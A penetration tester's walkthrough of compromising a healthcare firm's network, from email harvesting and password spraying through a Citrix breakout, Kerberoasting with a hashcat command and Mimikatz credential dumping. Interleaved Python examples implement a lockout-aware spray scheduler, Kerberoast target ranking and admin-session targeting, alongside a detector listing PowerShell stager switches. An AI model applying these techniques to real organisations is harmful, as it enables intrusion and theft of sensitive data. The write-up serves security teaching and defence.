Complete guide to Perform External Penetration Testing Step by Step methods.

IOTSPYNET
9 min read · Mar 9, 2022


This article describes one of my many external penetration testing engagements and how I compromised the organization.

I always debrief my client's top management after a security assessment (e.g. penetration testing, red teaming, etc.).

This allows us to discuss attack tactics, techniques, and procedures (TTPs), attack vectors, results, recommendations, and remediation activities.

Most of the time, the leadership teams are surprised by how I got my initial foothold on the network or by the strategies I used.

Most of them expected Tom Cruise-style hacking, circumventing firewalls, etc., only to be surprised by how easily I got in.

So I frequently educate my clients about modern attacks and how a gap as small as a weak user credential can collapse the entire network's defences.

In reality, cyber-attacks are more about efficiency than aesthetics. Adversaries do not seek the most difficult paths in. They mainly search for the quickest entry.

One of these ways is login credentials, which we call the path of least resistance. One set of user credentials can expose your whole network to an attacker.

The Goal

In 2018, a large healthcare business hired us to perform external network penetration testing. The company provided us with their domain name and IP address ranges. The purpose, of course, was to find internet-based attack vectors.

Checklist for External Penetration

For every cyber-attack or network penetration test, reconnaissance is an essential step. Passive and active intelligence gathering is done at this stage of the cyber kill chain.

With OSINT tools and platforms for external penetration testing, I normally do a lot of passive information gathering. When planning an attack approach, I rarely use network scanning tools against targets.

So, what do I look for in this phase?
From OSINT, I usually focus on the following items:

Subdomains
Login pages (Citrix, OWA, VPN, SharePoint, etc.)
Technology types (IIS, etc.)
Email addresses
Usernames (lots of them)

Tools for External Penetration

TheHarvester, SimplyEmail, Recon-ng, Shodan (shodan.io), Email Hunter (hunter.io), VirusTotal (virustotal.com), FOCA, Maltego and Pastebin (pastebin.com).

In addition, I was able to gather information on my client from previous breaches and leaks, such as subdomains, email addresses, and usernames.

To show one of the methods I used to collect the target's username format and email addresses (from which I later extracted the usernames), I'm using a mock domain and Email Hunter as the demonstration.

9,000+ email addresses and the username format for the target domain are shown below.
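The step just described, working out the username convention from a harvest and then turning names into usernames, as an added example that is not part of the original article or of Email Hunter: it scores a handful of common conventions against a constructed set of harvested addresses and names learned from other OSINT, picks the best-supported one, and generates candidates for people who have no address in the harvest. The domain, addresses and names are made up.

```python
"""Infer a target's username format from harvested email addresses and
generate candidate usernames for people who have no harvested address.

Added example for this article; not the author's or Email Hunter's code.
The domain, addresses and names are constructed."""
import re
from collections import Counter

HARVESTED = [  # constructed sample of a harvest
    "jsmith@example-health.test",
    "mjones@example-health.test",
    "akhan@example-health.test",
    "lwilliams@example-health.test",
    "helpdesk@example-health.test",   # role mailbox, fits no personal format
    "Jane.Doe@example-health.test",   # outlier in a different format
]
KNOWN_PEOPLE = [  # constructed: names learned from LinkedIn, press releases, etc.
    ("john", "smith"), ("mary", "jones"), ("amir", "khan"),
    ("laura", "williams"), ("jane", "doe"),
]

# Candidate username conventions, each a function of (first, last).
FORMATS = {
    "first.last": lambda first, last: f"{first}.{last}",
    "flast":      lambda first, last: f"{first[0]}{last}",
    "firstl":     lambda first, last: f"{first}{last[0]}",
    "first_last": lambda first, last: f"{first}_{last}",
    "lastf":      lambda first, last: f"{last}{first[0]}",
    "first":      lambda first, last: first,
}
EMAIL_RE = re.compile(r"([A-Za-z0-9._%+-]+)@([A-Za-z0-9.-]+\.[A-Za-z]{2,})")

def local_parts(emails):
    """Lower-cased local parts of syntactically plausible addresses."""
    out = []
    for e in emails:
        m = EMAIL_RE.fullmatch(e.strip())
        if m:
            out.append(m.group(1).lower())
    return out

def infer_format(emails, people):
    """Score each convention by how many known (first, last) pairs it explains.
    Returns (best_name, Counter) so the analyst can judge the evidence; the
    best name is None when no convention matches anything."""
    seen = set(local_parts(emails))
    hits = Counter()
    for name, fn in FORMATS.items():
        for first, last in people:
            if fn(first.lower(), last.lower()) in seen:
                hits[name] += 1
    best = hits.most_common(1)[0][0] if hits else None
    return best, hits

def generate_usernames(fmt, people):
    """Expand (first, last) pairs into usernames in the given convention, deduplicated."""
    fn = FORMATS[fmt]
    out, seen = [], set()
    for first, last in people:
        u = fn(first.lower(), last.lower())
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out

if __name__ == "__main__":
    fmt, evidence = infer_format(HARVESTED, KNOWN_PEOPLE)
    print("inferred format:", fmt, dict(evidence))
    if fmt:
        print(generate_usernames(fmt, [("peter", "brown"), ("sara", "lee")]))
```

The Counter is returned alongside the winner on purpose: a convention that explains four of five known names is solid evidence, one that explains a single address (the Jane.Doe outlier here) is not, and a real harvest usually contains both legacy and current conventions.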


Harvesting email addresses

Target Development

After spending a lot of time in the reconnaissance phase gathering data, I used this phase to map out my attack surface and plan my approach.

I was looking for applications and network services that authenticate against the organization's LDAP or Active Directory infrastructure: SMB, OWA, Autodiscover, VPN, Citrix, Jenkins, SharePoint, bespoke apps, etc.

Once I knew which services to target, I consolidated all the email addresses and usernames I had gathered during my research and removed any duplicates.

I had identified the client's external OWA and Citrix apps, as well as close to 1,000 distinct usernames. Onto the next stage of my kill chain I went.

Intrusion

This is where the action is. In most attacks, the adversary uses this phase to gain an initial foothold. The TTPs used in this phase will vary depending on the information acquired in the Reconnaissance and Target Development stages.

External penetration testing is all about efficiency and keeping things simple. In the early days of penetration testing, identifying and exploiting vulnerabilities was the norm.

But as adversaries' TTPs evolved, we had to adapt. An authentication-based attack, commonly known as password brute-forcing, is a simple yet powerful tactic.

You have one login and you attempt numerous possible passwords against it, hoping the person uses one from your list.

Administrators got wiser and implemented account lockout policies, so that after a particular number of failed login attempts (say five) the account locks out. To circumvent this, a new authentication-based attack dubbed password spraying arose (some call it horizontal or reverse brute-forcing).

This attack aggregates many usernames or email addresses (depending on the application or network service being targeted) and then tests one password against all of them to see who is using it. Each account sees only one failed attempt per round, so as long as rounds are spaced out beyond the lockout observation window the threshold is never reached.

Most of my real-world attacks and penetration testing engagements have used this approach. Burp Suite is my preferred tool for application-based password spray attacks, thanks to features like threading, throttling, and grepping response text to tell successful logins from failures.

Choosing passwords for a password spray attack is a little like picking lottery numbers. I generally try Season + Year (e.g. Summer2018, Winter19) and CompanyName + Numbers (e.g. Companyname123).
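The spraying rule above (one password across every user per round, rounds spaced so nobody reaches the lockout threshold, successes told apart by their response) as an added example that is not part of the original article and is not the author's Burp Suite configuration. It drives a constructed stand-in for a Citrix/OWA portal whose accounts, passwords and lockout policy are made up, so it runs offline; the scheduling logic is the point, including what happens when the round spacing is too aggressive.

```python
"""Lockout-aware password spray scheduler, exercised against a simulated
login portal.

Added example for this article, not the author's Burp Suite setup. The
portal, its accounts, its lockout policy and the password list are all
constructed; the point is the scheduling rule: one password across every
user per round, and never more than (threshold - 1) failures for any user
inside the lockout observation window."""
from collections import deque

class FakePortal:
    """Stand-in for a Citrix/OWA login page (constructed). Valid credentials
    answer with a chain of redirects; failures return the login form; five
    failures inside the observation window lock the account, like AD."""
    def __init__(self, valid, lockout_threshold=5, observation_window=1800):
        self.valid = valid                     # {username: password}
        self.threshold = lockout_threshold
        self.window = observation_window       # seconds
        self.failures = {}                     # user -> deque of failure times
        self.locked = set()

    def login(self, user, password, now):
        if user in self.locked:
            return {"status": 200, "redirects": 0, "body": "account locked"}
        if self.valid.get(user) == password:
            # /login -> /auth -> /home: the "three layers of redirection"
            return {"status": 302, "redirects": 3, "body": ""}
        q = self.failures.setdefault(user, deque())
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold:
            self.locked.add(user)
        return {"status": 200, "redirects": 0, "body": "login form"}

def looks_valid(resp):
    """Burp-style discriminator: a successful login redirects several times,
    a failure re-renders the form with status 200."""
    return resp["status"] in (301, 302) and resp["redirects"] >= 3

def safe_round_gap(lockout_threshold, observation_window):
    """Smallest spacing between rounds that keeps every user under the
    threshold in any window: (threshold - 1) attempts per window, plus a
    second of slack so the oldest attempt has aged out."""
    return observation_window / (lockout_threshold - 1) + 1

def spray(users, passwords, login, lockout_threshold, observation_window,
          round_gap, start=0):
    """One password per round against every user. `login(user, pw, now)` is
    the injected transport and `now` a simulated clock in seconds. A user is
    skipped in a round if trying them would be their (threshold)th attempt
    inside the window, so an over-eager `round_gap` degrades to skipped
    attempts instead of locked accounts. Returns (hits, last_round_time)."""
    safe_per_window = lockout_threshold - 1
    attempts = {u: deque() for u in users}
    hits, done, now = [], set(), start
    for rnd, password in enumerate(passwords):
        now = start + rnd * round_gap
        for user in users:
            if user in done:
                continue
            q = attempts[user]
            while q and now - q[0] > observation_window:
                q.popleft()
            if len(q) >= safe_per_window:
                continue                      # would risk lockout: skip
            q.append(now)
            if looks_valid(login(user, password, now)):
                hits.append((user, password))
                done.add(user)                # stop hammering a known-good account
    return hits, now

VALID = {"jsmith": "Winter2017", "lwilliams": "Companyname123"}      # constructed
USERS = ["jsmith", "mjones", "akhan", "lwilliams"]
PASSWORDS = ["Winter2017", "Spring2018", "Companyname123",
             "Summer2018", "Companyname1", "Welcome1"]

if __name__ == "__main__":
    portal = FakePortal(VALID)
    gap = safe_round_gap(5, 1800)          # 451 s between rounds for a 5/30 min policy
    hits, _ = spray(USERS, PASSWORDS, portal.login, 5, 1800, gap)
    print("hits:", hits, "locked:", portal.locked)
```

Before a real spray you need the policy numbers the gap is derived from (threshold and observation window, which an authenticated user can read from the domain, or which the client supplies), and you should treat a missing "three redirects" response as an unknown, not a failure: an MFA challenge, a captcha or a locked account all answer differently from a wrong password.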

I started the attack cautiously after configuring Burp Suite against the client's Citrix web application. My initial spray gave me two valid user credentials, both with the password Winter2017.

In the figure below, requests 208 and 853 are the valid credentials; they stand out because the successful logins go through three layers of redirection, which the failed attempts do not.

Password spray attack against Citrix login portal

A solid start!

I was then able to authenticate as those users in the client's Citrix portal. But, to my dismay, neither user had any Citrix apps published. What a pity.

Using the two legitimate credentials, I dumped the client's OWA Global Address List (GAL) with Black Hills' MailSniper. This gave me more usernames to use in my next password spray.

This time I sprayed the client's OWA with the password Companyname123 (the client's name plus 123). This gave me two more valid credentials, requests 395 and 431 in the image below.

This time, one of the users had an internal SAP application in their Citrix application catalog, and this SAP application opens in Internet Explorer.

Lateral Movement in EPT

At this point the attacker or penetration tester has gained some degree of access to the target, at either the application or the network level, with restricted or complete privileges.

The aim now is to move into the target's network while avoiding internal network security controls.

To advance into the target's internal network, we (adversaries/pentesters) gather further information.

Basically, we're back to reconnaissance, which might be host-based or network-based. Again, the techniques used in this phase might differ.

Citrix Breakout

I had gained application-level access and now wanted network-level access. Having previously broken out of Citrix sessions, I saw this as a chance to get onto the network.

NetSPI has an excellent blog post on Citrix breakouts. When I opened the victim's SAP application in Internet Explorer, I tried to save the web page's source code.

Viewing Citrix application's webpage source

Using the File menu's "Save As" option, I got a standard Windows file dialog, browsed to C:\Windows\System32 from it and ran the Windows command prompt (cmd.exe).

This opened CMD and gave me a shell on the backend Citrix server.

Broken out of Citrix

I generated a PowerShell Empire launcher and executed it on the Citrix server, which then called back to my Empire listener.

Running Empire PowerShell launcher on Citrix server
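The check a defender would want for the breakout just described, as an added example that is not part of the original article and not any product's output: the "Save As" trick leaves a tell-tale process tree (a shell whose parent is the published application's host process), and the Empire launcher that follows typically runs PowerShell with the usual stager switches. The records below are constructed in the shape of process-creation events (Sysmon event 1 / Windows 4688 style field names); the hosts, users and paths are made up.

```python
"""Flag the process tree a Citrix 'Save As' breakout leaves behind: a
command shell or script host whose parent is the published application,
and PowerShell launched with the switches stagers like Empire use.

Added example for this article; not the author's tooling and not the output
of any product. The events are constructed in the shape of process-creation
records (Sysmon event 1 / Windows 4688 style field names)."""
import base64
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Processes that typically carry the file dialog used for the breakout.
PUBLISHED_HOSTS = {"iexplore.exe", "msedge.exe", "chrome.exe", "winword.exe",
                   "excel.exe", "acrord32.exe", "notepad.exe"}
LAUNCHER_SWITCHES = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                     "-enc", "-encodedcommand", "-ec ", "-e ")

def basename(path):
    return ntpath.basename(path).lower()

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None
    when the command line carries none or it does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-ec", "-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(events):
    """Return one alert dict per suspicious event, with the reasons."""
    alerts = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cl = ev["CommandLine"].lower()
        reasons = []
        if image in SHELLS and parent in PUBLISHED_HOSTS:
            reasons.append("shell spawned from published app")
        if image in ("powershell.exe", "pwsh.exe") and any(s in cl for s in LAUNCHER_SWITCHES):
            reasons.append("powershell launcher switches")
        if reasons:
            alerts.append({"host": ev["host"], "user": ev["user"], "image": image,
                           "parent": parent, "reasons": reasons,
                           "decoded": decode_encoded_command(ev["CommandLine"])})
    return alerts

EVENTS = [  # constructed sample
    {"host": "CTX01", "user": "CORP\\jsmith",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Program Files (x86)\Citrix\System32\wfshell.exe",
     "CommandLine": "iexplore.exe https://sap.corp.local/"},
    {"host": "CTX01", "user": "CORP\\jsmith",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "cmd.exe"},
    {"host": "CTX01", "user": "CORP\\jsmith",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA="},
    {"host": "ADM01", "user": "CORP\\helpdesk1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    for a in triage(EVENTS):
        print(a)
```

The parent/child rule is the robust half: it does not care which shell or which dialog was abused, only that an interactive shell appeared under a published application. The same tree is what an AppLocker or software restriction policy on the Citrix servers should prevent in the first place, and the second event above is exactly the process that such a policy would have denied.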

Kerberoasting

Kerberoasting has been well discussed, so I will skip over the details and move on to what happened next. Because Citrix servers are high-value systems, only a few users have administrative privileges on them.

That said, the account with which I had acquired unprivileged access to the Citrix server was still a domain user, and that is all Kerberoasting needs. Any domain user can request a service ticket for any Service Principal Name (SPN), the Windows feature Kerberos uses to link a service instance with the account the service runs as; the ticket is encrypted with that account's password-derived key, so tickets for services running under user accounts can be cracked offline.

SPNs can be queried locally with setspn.exe or remotely with tools like Empire, Impacket, Metasploit, etc.

I dumped the SPN tickets and used Hashcat to crack the password hashes. Here is an example password cracking command (mode 13100 is Hashcat's Kerberos 5 TGS-REP etype 23 mode, i.e. RC4-encrypted tickets):

hashcat -m 13100 -a 0 spn.output password.list -r best64.rule

The SPN query result revealed several accounts in the Administrators group, one of which (IIS Admin) had its password cracked by Hashcat.
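The triage behind "several accounts in the Administrators group, one of which cracked", as an added example that is not part of the original article and is not Empire, Impacket or hashcat code: it ranks SPN-bearing accounts by how much a crack would be worth and how cheap it is (privileged group membership, whether an RC4 ticket can be requested, password age), and reads the encryption type out of a ticket line to pick the matching hashcat mode. The directory records are constructed in the shape of the LDAP attributes a roasting tool reads (pwdLastSet is simplified to a year); the LDAP filter, the encryption-type bits and the hashcat mode numbers are the real ones.

```python
"""Triage Kerberoasting targets and pick the hashcat mode for the tickets.

Added example for this article; not Empire's, Impacket's or hashcat's code.
The directory records are constructed in the shape of the LDAP attributes a
roasting tool reads; the LDAP filter, the encryption-type bit values and the
hashcat mode numbers are the real ones."""

# Roastable accounts: user objects with an SPN, excluding krbtgt.
ROASTABLE_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                    "(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))")

# msDS-SupportedEncryptionTypes bits (MS-KILE). Unset/0 means the domain
# default, which still hands out RC4 service tickets.
RC4_HMAC, AES128, AES256 = 0x4, 0x8, 0x10
UAC_ACCOUNTDISABLE = 0x2

# hashcat modes for TGS-REP tickets, keyed by Kerberos encryption type.
HASHCAT_MODE_BY_ETYPE = {23: 13100, 17: 19600, 18: 19700}

GROUP_WEIGHT = {"Domain Admins": 3, "Enterprise Admins": 3, "Administrators": 3,
                "Account Operators": 2, "Backup Operators": 2}

def rc4_allowed(acct):
    """True if a TGS for this account can be requested with RC4 (etype 23),
    the cheapest ticket type to crack."""
    etypes = acct.get("msDS-SupportedEncryptionTypes", 0)
    return etypes == 0 or bool(etypes & RC4_HMAC)

def roastable(accounts):
    """Apply ROASTABLE_FILTER's logic in memory: enabled users with an SPN."""
    return [a for a in accounts
            if a.get("servicePrincipalName")
            and a["sAMAccountName"].lower() != "krbtgt"
            and not a.get("userAccountControl", 0) & UAC_ACCOUNTDISABLE]

def score(acct, current_year=2018):
    """Higher is better: privileged group, RC4 allowed, password 3+ years old."""
    s = max((GROUP_WEIGHT.get(g, 0) for g in acct.get("memberOf", [])), default=0)
    if rc4_allowed(acct):
        s += 2
    if current_year - acct.get("pwdLastSet_year", current_year) >= 3:
        s += 1
    return s

def prioritize(accounts, current_year=2018):
    """Roastable accounts sorted by score, best target first."""
    return sorted(roastable(accounts),
                  key=lambda a: (-score(a, current_year), a["sAMAccountName"]))

def hashcat_mode(ticket_hash):
    """Read the etype out of a $krb5tgs$<etype>$... line and map it to a mode."""
    fields = ticket_hash.split("$")
    if len(fields) < 3 or fields[1] != "krb5tgs":
        raise ValueError("not a Kerberos TGS-REP hash line")
    return HASHCAT_MODE_BY_ETYPE[int(fields[2])]

def hashcat_command(ticket_hash, hashfile="spn.output", wordlist="password.list",
                    rules="best64.rule"):
    """The article's command line with the mode filled in from the ticket."""
    return f"hashcat -m {hashcat_mode(ticket_hash)} -a 0 {hashfile} {wordlist} -r {rules}"

ACCOUNTS = [  # constructed; pwdLastSet_year stands in for the real FILETIME
    {"sAMAccountName": "iisadmin", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "memberOf": ["Administrators"], "pwdLastSet_year": 2014},
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"],
     "memberOf": ["Domain Admins"], "msDS-SupportedEncryptionTypes": AES256 | AES128,
     "pwdLastSet_year": 2017},
    {"sAMAccountName": "svc_backup", "servicePrincipalName": ["backup/bk01.corp.local"],
     "memberOf": [], "msDS-SupportedEncryptionTypes": RC4_HMAC, "pwdLastSet_year": 2018},
    {"sAMAccountName": "svc_old", "servicePrincipalName": ["old/x.corp.local"],
     "memberOf": ["Domain Admins"], "userAccountControl": 0x202, "pwdLastSet_year": 2010},
    {"sAMAccountName": "krbtgt", "servicePrincipalName": ["kadmin/changepw"],
     "memberOf": [], "pwdLastSet_year": 2010},
]

if __name__ == "__main__":
    for a in prioritize(ACCOUNTS):
        print(score(a), a["sAMAccountName"], "rc4" if rc4_allowed(a) else "aes-only")
    print(hashcat_command("$krb5tgs$23$*iisadmin$CORP.LOCAL$HTTP/web01.corp.local*$00$11"))
```

The encryption-type check matters for the cracking budget: an AES-only service account (svc_sql above) still yields a ticket, but mode 19700 is orders of magnitude slower than 13100, so it drops down the queue unless the account is worth it. The same attribute is the defender's lever: setting AES-only on service accounts, alongside long random passwords, is what turns Kerberoasting from a quick win into a dead end.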

Credential Abuse/Re-use

From this external penetration test I had gathered vital information about the internal network, such as the list of Domain Admins, Enterprise Admins, Domain Controllers, etc.

To compromise the domain, I now needed to know which systems the Domain Admins and/or Enterprise Admins had recently used.

Tools like netview.py and Invoke-EventHunter can help with that. I then used the IIS Admin account with its cracked password to run CrackMapExec against a couple of servers where Domain and Enterprise Admins were logged in.

Credential abuse with CrackMapExec

I found a few servers where the IIS Admin account had local administrator rights and used CrackMapExec's Mimikatz module to extract credentials from them.
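The selection step above (where are the admins logged in, and on which of those hosts does the cracked account have local administrator rights) as an added example that is not part of the original article and is not netview.py, Invoke-EventHunter or CrackMapExec code. It resolves privileged group membership through nested groups, which is where a naive "is the user a direct member of Domain Admins" check misses targets, and intersects privileged sessions with the hosts the credential can actually reach. Sessions, group membership and the admin-check results are constructed in the shape those tools report.

```python
"""Choose where to use a cracked credential next: hosts where a privileged
user has a session AND where that credential is a local administrator,
with group membership resolved through nested groups.

Added example for this article; not netview.py, Invoke-EventHunter or
CrackMapExec code. Sessions, group membership and the admin-check results
are constructed in the shape those tools report."""

GROUP_WEIGHT = {"Enterprise Admins": 3, "Domain Admins": 3, "Backup Operators": 1}

def effective_members(group, groups, _seen=None):
    """Users reachable from `group` through nested groups, cycle-safe."""
    if _seen is None:
        _seen = set()
    if group in _seen:
        return set()
    _seen.add(group)
    users = set()
    for member in groups.get(group, ()):
        if member in groups:                  # a nested group
            users |= effective_members(member, groups, _seen)
        else:
            users.add(member)
    return users

def privilege(user, groups):
    """Weight of the most privileged group the user effectively belongs to."""
    return max((w for g, w in GROUP_WEIGHT.items()
                if user in effective_members(g, groups)), default=0)

def rank_targets(sessions, groups, local_admin):
    """Hosts with a privileged session where we are local admin, best first."""
    by_host = {}
    for host, user in sessions:
        p = privilege(user, groups)
        if p:
            by_host.setdefault(host, []).append((user, p))
    ranked = []
    for host, users in by_host.items():
        if local_admin.get(host):
            ranked.append({"host": host, "score": max(p for _, p in users),
                           "privileged_users": sorted(u for u, _ in users)})
    return sorted(ranked, key=lambda r: (-r["score"], r["host"]))

def out_of_reach(sessions, groups, local_admin):
    """Hosts with privileged sessions that this credential cannot reach; the
    list to revisit once another admin-level credential is in hand."""
    return sorted({h for h, u in sessions
                   if privilege(u, groups) and not local_admin.get(h)})

GROUPS = {  # constructed: IT-Ops is nested in Domain Admins and loops back
    "Domain Admins": {"da_alice", "IT-Ops"},
    "IT-Ops": {"dan", "Domain Admins"},
    "Enterprise Admins": {"ea_bob"},
    "Backup Operators": {"bk_carol"},
}
SESSIONS = [  # constructed (host, user) pairs as a netview-style enumeration returns
    ("FS01", "da_alice"), ("FS01", "jsmith"), ("SQL02", "ea_bob"),
    ("APP03", "bk_carol"), ("WEB04", "dan"), ("CTX01", "jsmith"), ("DC01", "da_alice"),
]
LOCAL_ADMIN = {  # constructed: where the cracked account is local admin
    "FS01": True, "SQL02": False, "APP03": True, "WEB04": True,
    "CTX01": False, "DC01": False,
}

if __name__ == "__main__":
    for t in rank_targets(SESSIONS, GROUPS, LOCAL_ADMIN):
        print(t)
    print("out of reach:", out_of_reach(SESSIONS, GROUPS, LOCAL_ADMIN))
```

Keeping the out-of-reach list is deliberate: after the first round of credential dumping the local-admin map changes, and the hosts that held the most valuable sessions (a domain controller, in the constructed data) are usually the ones that were unreachable in the first pass.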

Data Hunting and Exfiltration

An adversary's primary purpose is to access and/or retrieve sensitive/critical data, which we term the target's "crown jewels." This may be:

User credentials
Secret formulae
Blueprints
Personally Identifiable Information (PII)
Medical records
Financial data
Intellectual property

Exfiltration is the process of moving data from the target's network to an attacker-controlled system (e.g. a C2 server). This is generally done once data hunting has located the data of interest.

Penetration testing used to be about acquiring Domain Admin (DA) level access and calling it a day.

Today, an external penetration test must show the business risk and impact if your tests and attacks were carried out by a real-world adversary. That being said, this is a vital point in our tests.

Before moving any data out of a client's environment, a penetration tester should confirm with them whether data exfiltration is permitted under the Rules of Engagement.

If authorized, I thoroughly evaluate the data to show the customer the business risk and impact. Depending on the scenario and the compromised systems, different exfiltration strategies might be deployed.

External Penetration Testing

As you may have noticed, I did not run any vulnerability scans on this test. Why bring it up? I've seen reports or work that purported to be external penetration testing but were actually vulnerability assessments.

The debate over penetration test vs. vulnerability assessment has been going on for a long time.

But, as I often say, we learn from each other and from our interactions, and there are many ways to skin a cat. This is just one of the ways I conduct external penetration testing. Please don't hold me to a standard if my writing disappoints you!

Until then, thanks for reading.

